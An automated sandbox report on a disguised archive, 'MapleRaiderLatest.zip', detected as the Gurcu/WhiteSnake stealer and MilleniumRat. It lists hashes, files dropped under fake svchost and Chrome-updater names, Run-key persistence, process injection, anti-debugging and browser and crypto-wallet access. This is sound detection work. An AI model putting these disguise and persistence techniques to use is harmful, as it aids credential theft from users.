Malware Analysis Report

2024-11-30 13:20

Sample ID 241119-vflkqaycpa
Target MapleRaiderLatest.zip
SHA256 4b86d94ea8d7d5b71d124fdb17165df75aaee0c89d206384f7653839e696d542
Tags
upx gurcu milleniumrat collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4b86d94ea8d7d5b71d124fdb17165df75aaee0c89d206384f7653839e696d542

Threat Level: Known bad

The file MapleRaiderLatest.zip was found to be: Known bad.

Malicious Activity Summary

upx gurcu milleniumrat collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller rat spyware stealer

Gurcu family

Gurcu, WhiteSnake

Suspicious use of NtCreateProcessExOtherParentProcess

MilleniumRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Milleniumrat family

Contacts a large (1158) amount of remote hosts

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Checks BIOS information in registry

Checks computer location settings

Clipboard Data

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Adds Run key to start application

Looks up external IP address via web service

Enumerates processes with tasklist

Suspicious use of SetThreadContext

Drops file in System32 directory

UPX packed file

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Browser Information Discovery

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry key

Modifies data under HKEY_USERS

Checks processor information in registry

Checks SCSI registry key(s)

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Detects videocard installed

Gathers system information

Suspicious use of SetWindowsHookEx

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-19 16:56

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-19 16:55

Reported

2024-11-19 16:58

Platform

win7-20241023-en

Max time kernel

118s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI21322\python310.dll

MD5 4a6afa2200b1918c413d511c5a3c041c
SHA1 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3
SHA256 bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da
SHA512 dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

memory/444-14-0x000007FEF6680000-0x000007FEF6AE6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-19 16:55

Reported

2024-11-19 16:58

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

155s

Command Line

winlogon.exe

Signatures

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

MilleniumRat

rat stealer milleniumrat

Milleniumrat family

milleniumrat

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5332 created 3304 N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

Contacts a large (1158) amount of remote hosts

discovery

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\ProgramData\main.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\hacn.exe N/A
N/A N/A C:\ProgramData\Microsoft\hacn.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\Microsoft\based.exe N/A
N/A N/A C:\ProgramData\main.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\ProgramData\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe" C:\ProgramData\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\ProgramData\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5332 set thread context of 6124 N/A C:\ProgramData\setup.exe C:\Windows\System32\dialer.exe
PID 6916 set thread context of 3532 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe
PID 6916 set thread context of 5980 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe
PID 6916 set thread context of 6476 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\dialer.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\ProgramData\setup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
